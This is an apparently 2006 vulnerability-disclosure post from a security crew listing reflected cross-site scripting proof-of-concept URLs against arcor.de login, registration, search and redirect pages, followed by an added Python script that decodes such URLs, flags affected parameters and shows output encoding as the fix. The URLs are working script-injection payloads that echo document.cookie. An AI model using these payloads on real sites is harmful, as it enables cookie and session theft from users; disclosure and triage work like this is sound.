by r0t,der4444,cembo,VietMafia

Wednesday, March 29, 2006

arcor.de multiple XSS vuln.

Here are a few examples. The portal contains more than 100 XSS vulns, so I am not posting all of them here.

https://www.arcor.de/netpass/home.jsp?username=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&password=r0t&login.x=40&login.y=11

https://www.arcor.de/netpass/home.jsp?username=r0t&password=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&login.x=40&login.y=11

https://www.arcor.de/netpass/einrichten.jsp?username=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&password=r0t&password2=r0t&speichern.x=55&speichern.y=11

https://www.arcor.de/netpass/einrichten.jsp?username=r0t&password=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&password2=r0t&speichern.x=55&speichern.y=11

https://www.arcor.de/netpass/einrichten.jsp?username=r0t&password=r0t&password2=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&speichern.x=55&speichern.y=11

http://www.arcor.de/content/srearchresult.jsp?Keywords=Auto&teaser=1&scategorytype=web&searchID1=&searchID2=&naviID=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/content/srearchresult.jsp?Keywords=Auto&teaser=1&scategorytype=web&searchID1=&searchID2=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/content/srearchresult.jsp?Keywords=Auto&teaser=1&scategorytype=web&searchID1=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/login/login.jsp?goto=/tp/chatuser/?channel=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/login/login.jsp?goto=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=/gaming/highscore.jsp%3Fplay=go%26gameID=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=/gaming/highscore.jsp%3Fplay=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/tophopp/topflop.jsp?typ=%22%3Cscript%3Ealert('r0t')%3C/script%3E


If arcor coders or project owners are reading this report and want the full list of vulns, you can contact me via th3cracker at gmail.com
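For whoever triages a report like this on the defending side, here is an added example (not part of the original post): it decodes request URLs such as those listed above, groups by endpoint the parameters that carried markup characters, and shows the attribute-context encoding that renders a reflected value inert. The function names and the benign sample URL are constructed for illustration, and the reading that the leading %22 closes a quoted HTML attribute is an assumption about how the pages echo these values.

```python
import html
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that close a quoted attribute or open a tag when echoed unencoded.
MARKUP = re.compile(r'[<>"]')

# Three request URLs from the list above, plus one constructed benign login.
SAMPLE_URLS = [
    "https://www.arcor.de/netpass/home.jsp?username=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&password=r0t&login.x=40&login.y=11",
    "https://www.arcor.de/netpass/home.jsp?username=r0t&password=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&login.x=40&login.y=11",
    "http://www.arcor.de/gaming/login.jsp?goto=/gaming/highscore.jsp%3Fplay=go%26gameID=%22%3Cscript%3Ealert('r0t')%3C/script%3E",
    "https://www.arcor.de/netpass/home.jsp?username=alice&password=example&login.x=40&login.y=11",  # constructed
]


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable; goto= values can carry a re-encoded query."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_params(url):
    """Return (name, decoded value) for each query parameter carrying markup."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    decoded = [(name, decode_fully(raw)) for name, raw in pairs]
    return [(name, value) for name, value in decoded if MARKUP.search(value)]


def summarize(urls):
    """Map each endpoint path to the sorted parameter names that carried markup."""
    by_path = defaultdict(set)
    for url in urls:
        for name, _ in flag_params(url):
            by_path[urlsplit(url).path].add(name)
    return {path: sorted(names) for path, names in by_path.items()}


def encode_for_attribute(value):
    """Encode a value for output inside a quoted HTML attribute."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    print(summarize(SAMPLE_URLS))
    print(encode_for_attribute(flag_params(SAMPLE_URLS[0])[0][1]))
```

The character check is a triage heuristic for finding affected parameters in request logs; the fix itself is encoding every reflected value at output time, for the context it lands in.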

Copyright (c) 2006 Pridels Sec Crew